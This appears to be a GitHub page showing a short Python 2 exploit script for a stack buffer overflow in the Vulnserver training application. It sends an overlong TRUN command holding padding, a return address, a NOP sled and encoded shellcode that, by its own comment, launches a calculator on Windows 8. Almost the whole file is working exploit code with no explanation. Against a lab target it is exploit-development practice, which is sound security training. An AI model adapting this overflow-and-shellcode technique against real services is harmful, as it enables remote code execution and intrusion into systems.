-
Notifications
You must be signed in to change notification settings - Fork 0
/
vulnfuzz_weap.py
47 lines (40 loc) · 1.6 KB
/
vulnfuzz_weap.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
#Author: Aaron Huber
#Date: 5/2015
#This python script uses a buffer overflow to open a calculator on a Windows 8 OS running Vuln Server
import sys
import socket
ip = sys.argv[1]
port = int(sys.argv[2])
buf = ""
buf += "\xd9\xcf\xd9\x74\x24\xf4\xbf\x8f\x95\xb6\xbe\x5a\x31"
buf += "\xc9\xb1\x33\x31\x7a\x17\x83\xea\xfc\x03\xf5\x86\x54"
buf += "\x4b\xf5\x41\x11\xb4\x05\x92\x42\x3c\xe0\xa3\x50\x5a"
buf += "\x61\x91\x64\x28\x27\x1a\x0e\x7c\xd3\xa9\x62\xa9\xd4"
buf += "\x1a\xc8\x8f\xdb\x9b\xfc\x0f\xb7\x58\x9e\xf3\xc5\x8c"
buf += "\x40\xcd\x06\xc1\x81\x0a\x7a\x2a\xd3\xc3\xf1\x99\xc4"
buf += "\x60\x47\x22\xe4\xa6\xcc\x1a\x9e\xc3\x12\xee\x14\xcd"
buf += "\x42\x5f\x22\x85\x7a\xeb\x6c\x36\x7b\x38\x6f\x0a\x32"
buf += "\x35\x44\xf8\xc5\x9f\x94\x01\xf4\xdf\x7b\x3c\x39\xd2"
buf += "\x82\x78\xfd\x0d\xf1\x72\xfe\xb0\x02\x41\x7d\x6f\x86"
buf += "\x54\x25\xe4\x30\xbd\xd4\x29\xa6\x36\xda\x86\xac\x11"
buf += "\xfe\x19\x60\x2a\xfa\x92\x87\xfd\x8b\xe1\xa3\xd9\xd0"
buf += "\xb2\xca\x78\xbc\x15\xf2\x9b\x18\xc9\x56\xd7\x8a\x1e"
buf += "\xe0\xba\xc0\xe1\x60\xc1\xad\xe2\x7a\xca\x9d\x8a\x4b"
buf += "\x41\x72\xcc\x53\x80\x37\x22\x1e\x89\x11\xab\xc7\x5b"
buf += "\x20\xb6\xf7\xb1\x66\xcf\x7b\x30\x16\x34\x63\x31\x13"
buf += "\x70\x23\xa9\x69\xe9\xc6\xcd\xde\x0a\xc3\xad\x81\x98"
buf += "\x8f\x1f\x24\x19\x35\x60"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
s.connect((ip, port))
banner = s.recv(4096)
print banner
try:
cmd = "TRUN ." + "E"*2006 + "\xAF\x11\x50\x62" + "\x90"*100 + buf
s.send(cmd)
data = s.recv(4096)
print "Got %s" %data
except:
print "****************"
print "TANGO DOWN"
print "****************"